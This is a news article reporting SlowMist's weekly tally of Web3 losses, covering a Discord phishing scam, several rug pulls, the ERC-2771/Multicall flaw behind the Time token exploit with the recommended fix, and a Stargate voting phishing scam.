Web3 Exploit Losses Decrease Following November's Surge in Attacks

One of the most alarming incidents involved a massive rug pull linked to the CKD token, resulting in losses exceeding $0.5 million.

A gaming console on the top of a pile of money
Despite the Web3 community experiencing significantly smaller total losses last week than the damage caused by the November incidents, some attacks, including the Time token compromise, were quite sophisticated.

The Web3 cybersecurity team, SlowMist, has released its weekly incident report, revealing that losses between December 3 and December 9 totaled nearly $1.91 million. Although this amount is higher than the relatively modest damage estimated at around $225,000 for the period between November 26 and December 2, it remains notably low in comparison to the significant losses incurred during the major hacks affecting the Web3 community in November, where overall losses surpassed $363 million.

Read also: Lazarus Group Strikes with Telegram Phishing Attacks

One of the most notable incidents highlighted by SlowMist was the Xai phishing scam. On December 7, the blockchain security team posted on X that the Web3 gaming platform XAI "seems to be plagued by phishing."

XAI Phishing Overview
Source: SlowMist

"The attacker copied the official contract and sent the phishing link to the official Discord," SlowMist explained. Unfortunately, judging by the comments from the XAI community, the Layer 3 gaming solution was "too slow to delete the phishing link."

"It was deleted after someone shared that we bought through that CA, and it was being circulated in multiple groups, and the original CA was shared by the team like 30 minutes after the launch, which gave the chaos and phisher an advantage he took," X user Zosty and many others complained on the social media network, claiming that XAI is supposed to hold responsibility for the financial damage, which has reached almost $846,000.

Read also: New Trojan from BlueNoroff Threatens MacOS Crypto Users

The second-largest exploit detected by SlowMist last week was the exit scam involving the CKD TOKEN (CKD). This incident, happening on the Binance Smart Chain, has become one of the recent major rug pulls, leading to a loss of $539,000.

Other notable rug pulls affected the Abattoir of Zir (DIABLO) token, causing over $235,000 in losses, as well as the Strong Finance (STRONG) Debacle coin, stealing almost $61,000 from investors.

Last week, Ethereum-based smart contracts, including ERC20, ERC721, and ERC1155 used in the logic of the Time token, were also compromised. The Web3 development toolkit Thirdweb reported this issue in its contracts on December 7.

In its detailed analysis of the event, SlowMist claims that "The root cause of the vulnerability lies in the token contracts’ simultaneous use of ERC-2771 (a standard technology for meta-transactions) and the Multicall library, used for batch execution of multiple function calls.

"The attacker exploits this by calling the 'execute' function of the Forwarder contract to invoke the multicall function of the token contract, thereby executing other functions within the contract (such as burning tokens)," SlowMist explains, adding that "This method successfully passes the isTrustedForwarder check of ERC-2771, ultimately interpreting the function caller as the last 20 bytes of the malicious 'calldata.'"

These manipulations allowed the attacker to trick the smart contract into perceiving them as a legitimate user, subsequently resulting in the burning of a significant amount of Time tokens from a liquidity pool. Next, the malicious actor took advantage of the altered token prices and reversed their initial token swap, draining additional funds from the pool.

SlowMist reports total losses of $190,000 and recommends developers "not to use Multicall and ERC2771Context together when programming token contracts."

However, if this risky practice is deemed necessary for a project, SlowMist advises developers to either verify that the length of the "calldata" meets the expected criteria or, as an alternative, use the latest official versions of the Multicall and ERC2771Context contracts provided by OpenZeppelin.

Another incident mentioned in the SlowMist report is the Stargate snapshot scam that took place on December 4. This attack was orchestrated by a scammer who introduced a phishing link within a proposal vote on the Stargate platform. By enticing more than 1,000 users who participated in the voting to stake their STG tokens, the attacker managed to steal nearly $43,000.